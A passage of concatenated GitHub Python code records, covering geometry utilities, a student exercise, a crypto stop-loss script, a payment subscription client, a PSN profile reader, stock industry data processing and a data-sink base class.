array, shape=[N, 2]): locations in kitti label file.\n dims (float array, shape=[N, 2]): dimensions in kitti label file.\n angles (float array, shape=[N]): rotation_y in kitti label file.\n\n Returns:\n np.ndarray: corner representation of boxes.\n \"\"\"\n # 'length' in kitti format is in x axis.\n # xyz(hwl)(kitti label file)<->xyz(lhw)(camera)<->z(-x)(-y)(wlh)(lidar)\n # center in kitti format is [0.5, 1.0, 0.5] in xyz.\n corners = corners_nd(dims, origin=origin)\n # corners: [N, 4, 2]\n if angles is not None:\n corners = rotation_2d(corners, angles)\n corners += centers.reshape([-1, 1, 2])\n return corners\n\n\ndef zoom_boxes(boxes: torch.Tensor, roi_wh_zoom_scale: Tuple[float, float]):\n \"\"\"Zoom boxes.\n\n Args:\n boxes: shape (m, 4) in format.\n roi_wh_zoom_scale: (w_scale, h_scale).\n\n Returns:\n torch.Tensor: zoomed bboxes.\n \"\"\"\n boxes = boxes[..., :4]\n boxes_w = boxes[..., 2] - boxes[..., 0]\n boxes_h = boxes[..., 3] - boxes[..., 1]\n\n w_bias = 0.5 * (roi_wh_zoom_scale[0] - 1) * boxes_w\n h_bias = 0.5 * (roi_wh_zoom_scale[1] - 1) * boxes_h\n\n return torch.stack(\n [\n boxes[..., 0] - w_bias,\n boxes[..., 1] - h_bias,\n boxes[..., 2] + w_bias,\n boxes[..., 3] + h_bias,\n ],\n dim=-1,\n )\n\n\ndef minmax_to_corner_2d(minmax_box: np.ndarray):\n \"\"\"Convert min-max representation of a box into corner representation.\n\n Args:\n minmax_box (np.ndarray): [N, 2*ndim] box. 
ndim indicates whether it is\n a 2-d box or a 3-d box.\n\n Returns:\n np.ndarray: corner representation of a boxes.\n \"\"\"\n ndim = minmax_box.shape[-1] // 2\n center = minmax_box[..., :ndim]\n dims = minmax_box[..., ndim:] - center\n return center_to_corner_box2d(center, dims, origin=0.0)\n\n\ndef get_bev_bbox(coordinate, size, yaw):\n\n size = np.clip(size, a_min=1, a_max=None)\n if len(coordinate) == 0:\n return np.zeros([0, 4, 2])\n\n corners = size / 2\n corners = np.stack(\n [\n corners,\n corners * np.array([1, -1]),\n corners * np.array([-1, -1]),\n corners * np.array([-1, 1]),\n ],\n axis=-2,\n )\n bev_bbox = coor_transformation(corners, yaw[:, None], coordinate[:, None])\n\n return bev_bbox\n","repo_name":"xingyun-xy/cap","sub_path":"cap/core/box_utils.py","file_name":"box_utils.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7522849896","text":"#CTI-110\r\n#M3T1 - Areas of Rectangle\r\n#Oliver Hollis\r\n#11-09-2017\r\n#\r\n#Input the lenght and width of Rectangles\r\nrect_lenght1 = int(input('Enter the lenght of Rectangle 1: '))\r\nrect_width1 = int(input('Enter the lenght of Rectangle 1: '))\r\n\r\nrect_lenght2 = int(input('Enter the lenght of Rectangle 2: '))\r\nrect_width2 = int(input('Enter the lenght of Rectangle 2: '))\r\n\r\n# Caculate the Areas of the Rectangles\r\narea1 = rect_lenght1 * rect_width1\r\narea2 = rect_lenght2 * rect_width2\r\n\r\n# Determine which rectangle has a greater area\r\nif area1 > area2:\r\n print('Rectangle 1 has a greater area than Reactangle 2')\r\nelif area1 < area2:\r\n print('Rectangle 2 has a greater area than Reactangle 1')\r\nelse:\r\n print('Both have the same area')\r\n \r\n","repo_name":"holliso/cti110","sub_path":"M3T1_Areas_Rectangles_holliso.py","file_name":"M3T1_Areas_Rectangles_holliso.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21757512180","text":"import sys\nimport time\nimport traceback\n\nimport requests\n\nfrom library import stop_signal, sat, sell_limit_stop_loss, setup_logger, SellAsset, AccountHoldingZero\nfrom binance.client import Client as BinanceClient\n\nname = \"VRA\"\nstop_price_in_satoshi = 6.3\n\nstop_price = stop_price_in_satoshi * sat\n\nsell_asset_kucoin = SellAsset(\"kucoin\", name, stop_price, True, BinanceClient.KLINE_INTERVAL_5MINUTE)\n\nlogger = setup_logger(sell_asset_kucoin.name)\nlogger.info(\"Starting {} stop-loss maker on {}\".format(sell_asset_kucoin.market, sell_asset_kucoin.exchange))\nlogger.info(\"Stop price is set up to : {:.8f} BTC\".format(stop_price))\n\nwhile 1:\n try:\n stop = stop_signal(sell_asset_kucoin.exchange, sell_asset_kucoin.market, sell_asset_kucoin.ticker, stop_price, 4)\n if stop:\n sell_limit_stop_loss(sell_asset_kucoin.market, sell_asset_kucoin)\n logger.info(\"Stop-loss LIMIT order has been made on {}, exiting\".format(sell_asset_kucoin.exchange))\n sys.exit(0)\n time.sleep(40)\n except AccountHoldingZero as warn:\n logger.warning(warn)\n sys.exit(\"Exit\")\n except Exception as err:\n if isinstance(err, requests.exceptions.ConnectionError) or isinstance(err, requests.exceptions.ReadTimeout):\n logger.error(\"Connection problem...\")\n else:\n traceback.print_tb(err.__traceback__)\n 
logger.exception(err.__traceback__)","repo_name":"sroziewski/trading-bot","sub_path":"stop_loss_kucoin.py","file_name":"stop_loss_kucoin.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12165499376","text":"\"\"\"Utility functions for copying and archiving files and directory trees.\n\nXXX The functions here don't copy the resource fork or other metadata on Mac.\"\"\"\nimport shutil\n\n\ndef unpack(archive_path, path_to_unpack):\n \"\"\"Unpack archive to specified path.\"\"\"\n try:\n shutil.unpack_archive(archive_path, path_to_unpack)\n except ValueError:\n print('Not registered extension')\n","repo_name":"SiracencoSerghei/my-python-tasks","sub_path":"working_with_files/files_14_unzip.py","file_name":"files_14_unzip.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1495794653","text":"#coding:utf-8\n#data不包含name的\nclass StartRecording():\n name = \"camera._startPreview\"\n def __init__(self,stimime=None,stiwidth=None,stiheight=None,stimode=None,stiframerate=None,stibirate=None,\n orimime=None, oriwidth=None, oriheight=None,oriframerate=None,oribirate=None, saveori=None,logmode=None,\n audmime=None,audbitraite=None,samplerate=None,sampleformat=None,\n channellayout=None,timeenable=None,timeinterval=None,duration=None,fileoverride=None,\n storagepath=None,stabilization=None,**kw):\n\n self.data = {\"audio\": {\"channelLayout\": channellayout, \"bitrate\": audbitraite, \"samplerate\": samplerate,\"mime\": audmime, \"sampleFormat\": sampleformat},\n \"origin\": {\"mime\": orimime, \"width\": oriwidth,\"height\": oriheight,\"saveOrigin\": saveori,\"bitrate\":oribirate,\"framerate\":oriframerate,'logMode':logmode},\n 'storageSpeedTest':'false'}\n if(stimime and stiwidth and stiheight and stimode and stiframerate and stibirate):\n self.data['stiching']= {\"mime\": stimime, \"width\": stiwidth, \"height\": stiheight, \"mode\": stimode,\"framerate\":stiframerate,\"bitrate\":stibirate}\n if(timeenable and timeinterval):\n self.data['timelapse']={\"enable\":timeenable, \"interval\":timeinterval}\n if(duration):\n self.data['duration']=duration\n if (fileoverride):\n self.data['fileOverride'] = fileoverride\n if (storagepath):\n self.data['storagePath'] = storagepath\n if (stabilization):\n self.data['stabilization'] = stabilization\n\n for key, value in kw.items():\n '''\n if (key not in self.data['parameters']):\n self.data['parameters'][key] = value\n '''\n if (key not in self.data.keys()):\n self.data[key] = value\n\n def getJsonData(self):\n return self.data\n\nif __name__=='__main__':\n s=StartRecording(stimime='h265')","repo_name":"somesomeprincess/prointerface","sub_path":"model/StartRecording.py","file_name":"StartRecording.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40117093053","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"milk\": 0,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nprofit = 0\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n}\n\n\ndef payment(MENU):\n \"\"\"ask the user 
to insert coin shows the actual amount and verify if is enough for the drink\"\"\"\n total_coins = 0\n quarter = 0.25\n dime = 0.10\n nikel = 0.05\n penny = 0.01\n price_product = MENU[\"cost\"]\n print(\"Please insert coins\")\n quarter_insert = int(input(\"How many quarters: \"))\n total_quarter = quarter_insert * quarter\n total_coins += total_quarter\n print(f\"The total insert is {total_coins}\")\n dime_insert = int(input(\"How many dimes: \"))\n total_dimes = dime_insert * dime\n total_coins += total_dimes\n print(f\"The total insert is {total_coins}\")\n nikel_insert = int(input(\"How many nikel: \"))\n total_nikel = nikel_insert * nikel\n total_coins += total_nikel\n print(f\"The total insert is {total_coins}\")\n penny_insert = int(input(\"How many penny: \"))\n total_penny = penny_insert * penny\n total_coins += total_penny\n print(f\"The total insert is {total_coins}\")\n if total_coins >= MENU[\"cost\"]:\n print(\"Here is your drink enjoy!!\")\n if total_coins > MENU[\"cost\"]:\n change = round(total_coins - MENU[\"cost\"], 2)\n print(f\"You're change : {change}\")\n profit = total_coins - change\n return profit\n else:\n print(f\"You insert {total_coins}, the prize is {price_product}\\n I give back your money\")\n profit = 0\n return profit\n\n\ndef resources_check(water, milk, coffee, MENU):\n \"\"\"Check if is enough ingredients in the coffee machine\"\"\"\n if water < MENU[\"ingredients\"][\"water\"]:\n print(\"Sorry there is not enough water\")\n check = False\n return check\n elif coffee < MENU[\"ingredients\"][\"coffee\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n elif milk < MENU[\"ingredients\"][\"milk\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n else:\n check = True\n return check\n\nwater = resources[\"water\"]\nmilk = resources[\"milk\"]\ncoffee = resources[\"coffee\"]\nmoney = 0\non = True\nwhile on:\n order = input(\"What do you like? 
espresso, latte, cappuccino,prize: \").lower()\n # TODO print the report\n\n if order == \"report\":\n print(f\"Water: {water}\\nMilk: {milk} \\nCoffee: {coffee}\\nMoney:$ {money}\")\n elif order == \"off\":\n on = False\n elif order == \"price\":\n print(\"Espresso price:$\", MENU[\"espresso\"][\"cost\"], \"\\n\", \"Latte price:$\", MENU[\"latte\"][\"cost\"], \"\\n\",\n \"Cappuccino price:$\", MENU[\"cappuccino\"][\"cost\"])\n elif order == \"espresso\":\n is_enough = resources_check(water, milk, coffee, MENU[\"espresso\"])\n if is_enough:\n water -= MENU[\"espresso\"][\"ingredients\"][\"water\"]\n coffee -= MENU[\"espresso\"][\"ingredients\"][\"coffee\"]\n money_es = payment(MENU[\"espresso\"])\n money += money_es\n elif order == \"latte\":\n is_enough = resources_check(water, milk, coffee, MENU[\"latte\"])\n if is_enough:\n water -= MENU[\"latte\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"latte\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"latte\"][\"ingredients\"][\"coffee\"]\n money_la = payment(MENU[\"latte\"])\n money += money_la\n elif order == \"cappuccino\":\n is_enough = resources_check(water, milk, coffee, MENU[\"cappuccino\"])\n if is_enough:\n water -= MENU[\"cappuccino\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"cappuccino\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"cappuccino\"][\"ingredients\"][\"coffee\"]\n money_cap = payment(MENU[\"cappuccino\"])\n money += money_cap\n\n\n","repo_name":"Vvollono/machine_coffee","sub_path":"coffee_machine_v1.0.py","file_name":"coffee_machine_v1.0.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70560904808","text":"import apoc\nfrom skimage.io import imread, imsave\nfrom pathlib import Path\nimport numpy as np\n\n\ndef test_back_and_forth_feature_ordering():\n root = Path(apoc.__file__).parent\n img_path = str(root / '..' / 'demo' / 'blobs.tif')\n image = imread(img_path)\n\n img_path = str(root / '..' / 'demo' / 'annotations.tif')\n gt_image = imread(img_path)\n\n img_path = str(root / '..' 
/ 'demo' / 'reference_labels.tif')\n ref_image = imread(img_path)\n\n feature_specs = \"original gaussian_blur=1 sobel_of_gaussian_blur=1\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result1 = classifier.predict(image=image)\n\n feature_specs = \"sobel_of_gaussian_blur=1 gaussian_blur=1 original\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result2 = classifier.predict(image=image)\n\n binary1 = result1 > 0\n binary2 = result2 > 0\n\n imsave(\"binary1.tif\", binary1)\n imsave(\"binary2.tif\", binary2)\n\n intersection = binary1 * binary2\n union = (binary1 + binary2) > 0\n\n jaccard_index = intersection.sum() / union.sum()\n\n print(jaccard_index)\n\n assert jaccard_index > 0.999\n\n\n","repo_name":"haesleinhuepf/apoc","sub_path":"tests/test_back_and_forth_feature_ordering.py","file_name":"test_back_and_forth_feature_ordering.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"29888171634","text":"import httplib\ntry:\n from xml.etree import ElementTree\nexcept ImportError:\n # Python < 2.5\n from elementtree import ElementTree\n\n# ARB expects request parameters in a particular order\nREQUEST_KEY_ORDER = (\"merchantAuthentication refId subscriptionId subscription name transactionKey \"\n \"paymentSchedule interval length unit \"\n \"startDate totalOccurrences trialOccurrences amount trialAmount \"\n \"payment creditCard cardNumber expirationDate cardCode bankAccount \"\n \"accountType routingNumber accountNumber nameOnAccount echeckType \"\n \"bankName order invoiceNumber description customer id email \"\n \"phoneNumber faxNumber billTo firstName lastName company address \"\n \"city state zip country shipTo\".split())\n\ndef arb_request_key_order(i):\n try:\n return REQUEST_KEY_ORDER.index(i[0])\n except ValueError:\n raise Exception('Unexpected ARB request key: %s' % i[0])\n\ndef xmlify_dict(d, indent=0):\n s = ''\n for k, v in sorted(d.items(), key=arb_request_key_order):\n if isinstance(v, dict):\n v = '\\n' + xmlify_dict(v, indent + 2) + ' ' * indent\n s += '%s<%s>%s\\n' % (' ' * indent, k, v, k)\n return s\n\ndef dictify_etree_node(node):\n d = {}\n for child in node:\n d[child.tag[child.tag.index('}') + 1:]] = dictify_etree_node(child)\n return d or node.text.strip()\n\nclass ARBConnection(object):\n\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.server = server\n self.login = login\n self.salt = salt\n self.timeout = timeout\n self.key = key\n self.authentication = {\n 'name': self.login,\n 'transactionKey': self.key\n }\n\n def sendTransaction(self, method, **kw):\n kw['merchantAuthentication'] = self.authentication\n \n xml = \"\"\"\n<%s xmlns=\"AnetApi/xml/v1/schema/AnetApiSchema.xsd\">\n%s\n\n\"\"\" % (method, xmlify_dict(kw), method)\n \n if self.server.startswith('localhost:'):\n server, port = self.server.split(':')\n conn = httplib.HTTPConnection(server, port)\n else:\n conn = httplib.HTTPSConnection(self.server, timeout=self.timeout)\n conn.putrequest('POST', '/xml/v1/request.api')\n conn.putheader('content-type', 'text/xml')\n conn.putheader('content-length', len(xml))\n conn.endheaders()\n conn.send(xml)\n\n response = conn.getresponse().read()\n root = ElementTree.fromstring(response)\n result = dictify_etree_node(root)\n result['full_response'] = 
response\n return result\n\n\nclass ARBProcessor(object):\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.connection = ARBConnection(server, login, key, salt, timeout)\n\n def create(self, **kw):\n if not isinstance(kw['subscription']['amount'], basestring):\n raise ValueError('Subscription amount must be a string')\n if not isinstance(kw['subscription'].get('trialAmount', ''), basestring):\n raise ValueError('Subscription trialAmount must be a string')\n\n return self.connection.sendTransaction('ARBCreateSubscriptionRequest', **kw)\n\n def update(self, **kw):\n return self.connection.sendTransaction('ARBUpdateSubscriptionRequest', **kw)\n\n def cancel(self, **kw):\n return self.connection.sendTransaction('ARBCancelSubscriptionRequest', **kw)\n","repo_name":"collective/getpaid.authorizedotnet","sub_path":"src/getpaid/authorizedotnet/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30616386964","text":"from psnawp_api import psnawp\nimport userInfo\nimport login\n\n# 유저 인스턴스 선언\nuserInfoInstance = userInfo.UserInfo(login.onlineID, login.npssoCode).GetPlayerInstance()\n\nuserProfile = userInfoInstance.profile()\n\n#print(userProfile)\n\n# 유저의 프로필 사진의 URL을 가져옴\ndef GetUserProfileImageURL():\n profileImageURL = userProfile['personalDetail']['profilePictures'][1]['url'] # size 'm'의 url을 가져옴\n\n return profileImageURL\n\n# 유저의 psn 이름을 가져옴\ndef GetUserProfileName():\n firstName = userProfile['personalDetail']['firstName']\n lastName = userProfile['personalDetail']['lastName']\n fullName = firstName + lastName\n\n return fullName\n\n# 유저의 총 트로피 개수를 가져옴\ndef GetUserProfileTrophies():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n\n # 유저의 전체 트로피 개수를 트로피 별로 가져온다\n trophyCount_bronze = trophySummary['earnedTrophies']['bronze']\n trophyCount_silver = trophySummary['earnedTrophies']['silver']\n trophyCount_gold = trophySummary['earnedTrophies']['gold']\n trophyCount_platinum = trophySummary['earnedTrophies']['platinum']\n\n # 전체 트로피 개수\n trophyCount_total = trophyCount_bronze + trophyCount_silver + trophyCount_gold + trophyCount_platinum\n\n # 유저 트로피 정보를 딕셔너리 형태로 내보낸다\n userTrophyCountInfo = {\n 'bronze' : trophyCount_bronze,\n 'silver' : trophyCount_silver,\n 'gold' : trophyCount_gold,\n 'platinum' : trophyCount_platinum,\n 'total' : trophyCount_total\n }\n\n return userTrophyCountInfo\n\n# 유저의 프로필 레벨을 가져옴 (나중에 추가)\ndef GetUserProfileTrophyLevel():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n \n return trophySummary['trophyLevel']","repo_name":"snwdaaa/PSAchivementManager","sub_path":"psam/src/getUserInfos.py","file_name":"getUserInfos.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"211572576","text":"\r\nimport os\r\nimport datetime as dt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport scipy.io as scio\r\n\r\nfrom remotewind import w\r\n\r\n\r\n\r\n\r\n\r\ndef get_dict(dtype='change'):\r\n if dtype=='change':\r\n swChangeLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\change_dict.csv', encoding='gbk')\r\n swChangeDict = {}\r\n for dumi in range(swChangeLevel1.shape[0]):\r\n if swChangeDict.get(swChangeLevel1['swName1Old'][dumi]) is None:\r\n swChangeDict[swChangeLevel1['swName1Old'][dumi]] = [swChangeLevel1['swName1New'][dumi]]\r\n else:\r\n 
swChangeDict[swChangeLevel1['swName1Old'][dumi]].append(swChangeLevel1['swName1New'][dumi])\r\n return swChangeDict\r\n else:\r\n swNameLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_dict_level1.csv', encoding='gbk')\r\n swNameCodeDict = {swNameLevel1['swName1'][dumi]: swNameLevel1['swCode1'][dumi] for dumi in range(swNameLevel1.shape[0])}\r\n swNameCodeDict[np.nan] = -1\r\n return swNameCodeDict\r\n\r\nclass CONSTATNS:\r\n LATEST = 20180709\r\n swNameCodeDict = get_dict(dtype='name')\r\n swChangeDict = get_dict(dtype='change')\r\n\r\n\r\ndef date_trans(tdt):\r\n if isinstance(tdt,str):\r\n return int(dt.datetime.strptime(tdt,'%Y/%m/%d').strftime('%Y%m%d'))\r\n elif np.isnan(tdt):\r\n return CONSTATNS.LATEST\r\n\r\ndef history_sw_data():\r\n lastData = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20180709.csv',encoding='gbk')\r\n lastStks = lastData['stkcd'].values\r\n histData = pd.read_csv(r'.\\sw_history.csv',encoding='gbk')\r\n histData.columns = ['stkcd','exchg','stkname','standerd','indate','outdate','swName1','swName2','swName3','isnew']\r\n histData['stkcd'] = histData['stkcd'].map(lambda x:int(x))\r\n histData['indate'] = histData['indate'].map(date_trans)\r\n histData['outdate'] = histData['outdate'].map(date_trans)\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:,0]\r\n stkInfo = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:,[0,1,2]] # stkcd and ipo date\r\n stkInfo[:,2] = CONSTATNS.LATEST\r\n offListed = sorted(list(set(stkInfo[:, 0]) - set(lastStks)))\r\n stkInfo = pd.DataFrame(stkInfo,columns=['stkcd','ipo_date','delist_date']).set_index('stkcd')\r\n offListedWind = ['{}.SH'.format(stkcd) if stkcd>=600000 else ''.join(['0'*(5-int(np.log10(stkcd))),'{}.SZ'.format(stkcd)]) for stkcd in offListed]\r\n offListedDate = [int(tdt.strftime('%Y%m%d')) for tdt in w.wss(offListedWind,'delist_date').Data[0]]\r\n stkInfo.loc[offListed,'delist_date'] = offListedDate\r\n stkInfo.reset_index(inplace=True)\r\n for tdt in trdDates:\r\n if tdt>=CONSTATNS.LATEST:\r\n break\r\n listedIdx = np.logical_and(stkInfo['ipo_date'].values<=tdt,stkInfo['delist_date'].values>=tdt)\r\n listedStocks = stkInfo.loc[listedIdx,'stkcd']\r\n histCut = histData.loc[np.isin(histData['stkcd'],listedStocks),:]\r\n histCutIdx = np.logical_and(histCut['indate'].values<=tdt,histCut['outdate'].values>tdt)\r\n histCut = histCut.loc[histCutIdx,['stkcd','swName1','swName2','swName3']]\r\n if histCut.empty:\r\n print('{} is empty'.format(tdt))\r\n histCut.to_csv(os.path.join(r'E:\\stocks_data\\sw_industry\\sw_data','sw_industry_{}.csv'.format(tdt)),index=False)\r\n\r\n\r\ndef sw_leve1_code(swName1,swName2,stkcd,tdate,lastNoChange,firstChange):\r\n if swName1 in CONSTATNS.swNameCodeDict:\r\n code = CONSTATNS.swNameCodeDict[swName1]\r\n elif swName1 in CONSTATNS.swChangeDict:\r\n if len(CONSTATNS.swChangeDict[swName1])==1: # 一一对应,直接返回即可\r\n code = CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][0]]\r\n else: # 旧名 一对多 新名,\r\n # 先通过 二级行业进行匹配\r\n name2Pair = np.array([name in swName2 for name in CONSTATNS.swChangeDict[swName1]])\r\n if swName2 in CONSTATNS.swChangeDict[swName1]: # 二级行业名 变更为 新一级行业名\r\n code = CONSTATNS.swNameCodeDict[swName2]\r\n elif swName1 == '金融服务' and swName2 != '银行': # 非银 特殊处理\r\n code = CONSTATNS.swNameCodeDict['非银金融']\r\n elif swName1 == '信息服务' and swName2=='网络服务':\r\n code = CONSTATNS.swNameCodeDict['计算机']\r\n elif np.any(name2Pair): # 新一级行业 包含于 旧二级行业\r\n code = 
CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][np.argwhere(name2Pair)[0][0]]]\r\n else: # 二级行业匹配失败,按照行业变更后 该股票所属行业\r\n if stkcd in firstChange.index: # 若该股票行业变动时还为退市,对照改名后该股票所在的行业\r\n newName1 = firstChange.loc[stkcd,'swName1']\r\n if newName1 in CONSTATNS.swChangeDict[swName1]: # 变更后的行业名 处在 变更字典中\r\n code = CONSTATNS.swNameCodeDict[newName1]\r\n else: # 变更后股票未退市,但是该股票发生行业变更,且变更后行业 不属于变更字典,需要特殊处理\r\n code = np.nan\r\n else: # 行业变更时 股票已经退市 匹配失败\r\n code = np.nan\r\n else: #\r\n code = np.nan\r\n if tdate<=20131231: # 使变更前的行业恢复的更加均衡\r\n if (stkcd in firstChange.index) and (stkcd in lastNoChange.index):\r\n newName1 = firstChange.loc[stkcd, 'swName1']\r\n code = CONSTATNS.swNameCodeDict[newName1] if lastNoChange.loc[stkcd,'swName1']==swName1 else code # 与变更前对后一天相同的行业,使用变更后的代码\r\n return code\r\n\r\n\r\ndef update_sw_mat():\r\n\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:, 0]\r\n stkCodes = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:, 0]\r\n ##### update mat #####\r\n swPath = r'E:\\stocks_data\\sw_industry\\sw_data'\r\n histMatName = 'data_19901219_20170630'\r\n histPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry','{}.mat'.format(histMatName))\r\n if not os.path.exists(histPath):\r\n histStkNum = 3433\r\n histDayNum = 6488\r\n histStks = stkCodes[:histStkNum]\r\n histTrds = trdDates[:histDayNum]\r\n histMat = pd.DataFrame(np.zeros([histStkNum,histDayNum]),index=histStks,columns=histTrds)\r\n firstChange = pd.read_csv(os.path.join(swPath,'sw_industry_20140102.csv'), encoding='gbk').set_index('stkcd')\r\n lastNoChange = pd.read_csv(os.path.join(swPath, 'sw_industry_20131231.csv'), encoding='gbk').set_index('stkcd')\r\n for tdt in histTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swCode1 = []\r\n for stkcd in swData.index.values:\r\n swName1 = swData.loc[stkcd, 'swName1']\r\n swName2 = swData.loc[stkcd, 'swName2']\r\n swCode1.append(sw_leve1_code(swName1=swName1,\r\n swName2=swName2,\r\n stkcd=stkcd,\r\n tdate=tdt,\r\n lastNoChange=lastNoChange,\r\n firstChange=firstChange))\r\n swData['swCode1'] = swCode1\r\n histMat.loc[swData.index,tdt] = swData['swCode1']\r\n print(tdt)\r\n scio.savemat(file_name=histPath, mdict={'swIndustry': histMat.values})\r\n print('hist mat created')\r\n currMatName = 'data_20150701_now'\r\n currPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry', '{}.mat'.format(currMatName))\r\n currDayStart = 6000\r\n if not os.path.exists(currPath):\r\n currTrds = trdDates[currDayStart:]\r\n currMat = pd.DataFrame(np.zeros([stkCodes.shape[0], currTrds.shape[0]]), index=stkCodes, columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index,tdt] = swData['swCode1']\r\n print(tdt)\r\n scio.savemat(file_name=currPath, mdict={'swIndustry':currMat.values})\r\n print('curr mat created')\r\n else:\r\n currDates = trdDates[currDayStart:]\r\n currStkcds = stkCodes\r\n currDayNum = currDates.shape[0]\r\n currStkNum = currStkcds.shape[0]\r\n currMatSaved = scio.loadmat(currPath)['swIndustry']\r\n (savedStkNum, savedDayNum) = currMatSaved.shape\r\n if (currDayNum == savedDayNum) and (currStkNum == savedStkNum):\r\n print('no data to update')\r\n return\r\n currTrds = currDates[currDayNum-2:] # 前一天的重新更新,弥补新股\r\n currMat = 
pd.DataFrame(np.zeros([currStkNum, currDayNum-savedDayNum+1]), index=stkCodes,columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath, 'sw_industry_{}.csv'.format(tdt)), encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index, tdt] = swData['swCode1']\r\n patch = np.zeros([currStkNum-savedStkNum, savedDayNum - 1])\r\n currMat = np.column_stack([np.row_stack([currMatSaved[:,:-1],patch]), currMat.values])\r\n scio.savemat(file_name=currPath, mdict={'swIndustry': currMat})\r\n print('curr mat updated')\r\n\r\nif __name__=='__main__':\r\n update_sw_mat()\r\n # pr = scio.loadmat(r'C:\\Users\\Jiapeng\\Desktop\\matlab.mat')['t']\r\n # old = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20131231.csv',encoding='gbk').set_index('stkcd')\r\n # new = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20140102.csv',encoding='gbk').set_index('stkcd')\r\n # data = pd.concat([old.loc[pr[:,0],'swName1'],new.loc[pr[:,0],'swName1']],axis=1)\r\n # data.to_csv(r'E:\\stocks_data\\sw_industry\\tempdict.csv')\r\n","repo_name":"wqxl309/sw_industry","sub_path":"history_sw_industry.py","file_name":"history_sw_industry.py","file_ext":"py","file_size_in_byte":10236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3227127025","text":"from abc import abstractmethod\n\nfrom .base import Component\nfrom ..utils.filter import filter_dict, load_filter_file\n\n\nclass Sink(Component):\n \"\"\"\n Main base class to implement a Sink.\n \"\"\"\n\n def __init__(\n self, index, type_, id_,\n optional=False, timeout=None, config=None\n ):\n super().__init__(\n index, type_, id_,\n optional=optional, timeout=timeout, config=config\n )\n\n def _component_execute(self, data):\n \"\"\"\n Sink component execute override.\n\n This function will just call the user provided ``distribute()``\n function with the input data and return an empty dictionary\n (\"no data\").\n \"\"\"\n self.distribute(data)\n return {}\n\n @abstractmethod\n def distribute(self, data):\n \"\"\"\n Distribute the collected data.\n\n All sinks subclasses must implement this abstract method.\n\n :param OrderedDict data: The collected data. 
